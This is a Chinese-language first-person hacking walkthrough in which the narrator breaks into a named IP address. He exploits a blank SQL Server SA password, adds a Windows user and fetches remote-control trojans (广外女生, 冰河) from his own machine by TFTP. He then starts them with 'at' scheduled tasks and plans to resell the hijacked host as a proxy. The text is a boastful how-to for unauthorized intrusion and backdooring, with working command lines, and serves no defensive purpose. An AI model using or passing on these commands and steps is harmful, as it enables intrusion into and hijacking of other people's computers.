欧阳青佛:简单入侵

来源:百度文库 编辑:中财网 时间:2024/03/29 23:57:33
看看这主机是否是网站先,用IE打开它的IP:61。170。168。168,出现“该页无法显示”。看来这主
机还没WEB网页。祭起我的“X-SCAN”宝刀,全面扫描一下它的各种漏洞,我就不信他没有漏洞!
(玩黑必备一:眼睛长到头顶上)
 X-SCAN扫描结果报告:
 “端口开放:1433、3389
 ASP 漏洞:don‘t find CGI漏洞: don‘t find IIS漏洞don‘t find……,SQL:SA /NULL”
 呵呵,大局已定,大家看到了有哪些漏洞吗?什么,你不懂鸟语?哇噻,你先去补习鸟语再到我这来!
对了,我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言,听说二位不日将移民火星,
你趁他们还在地球快去拜师学艺啊!
 再接着卖我的黄婆烂瓜……
 3389——我得最爱!利用远程主机打开的远程控制功能(通过3389连接)进入它的WINDOWS图形界面,
这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~
 废话少说,打开我的“WINDOW2000远程客户程序”,填IP、点“联接”~~啊?连不上!再连~~还是不行
!55555……输入法漏洞是玩不成了。
 一招不行再换一招!点根烟先……打开“天行网络”所制的精品软件——SQLEXEC,填上IP,用户名:
SA,密码为空,点“连接”---“:(连接成功!”
进来了,谈笑间我就进来了,我真厉害~~(玩黑必备二:自夸不怕吓死人)。先看看它的C盘的文件:
DIR C:,OK!这机子装的是WINNT,怪不得我用WIN2000的远程客户程序连不上,可是它怎么会打开
WIN2000的远程连接用端口-3389端口呢?
算了,越想越乱,忙我的正事吧。
 为安全起见,让我看看它建立了哪些连接进程:“netstat -n”……哈,反馈回来的信息都是一些
196开头的IP,没开TTY监听,这该不会是个局域网的服务器吧?
 再来看看我现在的权限有多少:“net user aaa 1234 /add”---“成功建立新用户”。呵呵,
权限还不小,能建新用户哦~~由于我机子用的是WIN98,所以没法用这新建的用户名为AAA,密码
为1234的帐户进行连接,这帐户对我来说根本
没用……
 现在,我们即将开始取得远程主机的最最最……大权限!啥?你不信?呵呵,说你菜你还不高兴,
听说过木马吗?听说过大名鼎鼎专玩木马的“符号”大虾吗?哦,你不知木马只知符大虾……行,
赶明儿我让符大虾在你机子里也放个木马,这样你就
能深刻理解啥叫木马了~~
 继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行,前几天也
曾去黑网下栽了一个,它的被控端程序才90K,上传比较容易,就用它做远程主机的“后门”吧。1。
打开TFTP(一个能把你的PC变成FTP服务器的小程序)——
2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入
命令:"tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe"
 5分钟后,GW。EXE已乖乖在躺在远程主机的C盘里了~~~
 现在,得想法子运行GW。EXE:1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入
程序起动时间命令"at 09:37 c:\gw.exe"(GW在9:37运行)——出现主机反应:“建立一个新任务,
ID=1”
OK!二分钟后将运行我的“广外女生”了!
 打开我的“广外”控制端程序,在主机查找栏里填上“61.170.168.160---61.171.168.170”,点
“查找”。扫描很慢……别急……扫完了……啊?!在这扫描的IP端里无中“奖”主机!怪事啊!
是远程主机的“广外”没有运行还是我对这控制端程序的操
作错误?一定是这破“广外”本身程序不行,太烂了~~(玩黑必备三:一切都不是我的错!)。
 看来,今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200
多K,估计上传时间会很久,但如果上传成功,它的功能可不是“广外”所能与之并论的啊!另外,
对冰河的界面操作也不会似“广外”那嚒陌生……
 言归正传,现在开始上传“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe"
(为不至于太过醒目,这次把文件传到C盘的INETPUB文件包下)
 缓慢上传中……让我再点根烟,趁这功夫去“黑白网络”的技术论坛逛逛去……
 已过25分钟了,进远程主机瞧瞧是否已下栽成功了~~OK!冰河已在那里了。接着:“net time”,
反馈信息:10:30”。“at 10:32 c:\inetpub\GG.exe”,反馈信息“运行新任务,ID=1”
 二分钟后,打开“冰河”控制端,加入远程主机IP,连接……成功!接着再:添加服务器端连接密码、
添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
 ……
 现在,这主机的一切已尽在我眼前了,真爽啊!明天,我也许会把一个SOCK5代理的服务器端程序放进
这主机,大家以后要是想用SOCK5代理,又懒得去漫无目标的查找的话,请找我,我会把我这个人专用
“肉机”贡献出来的。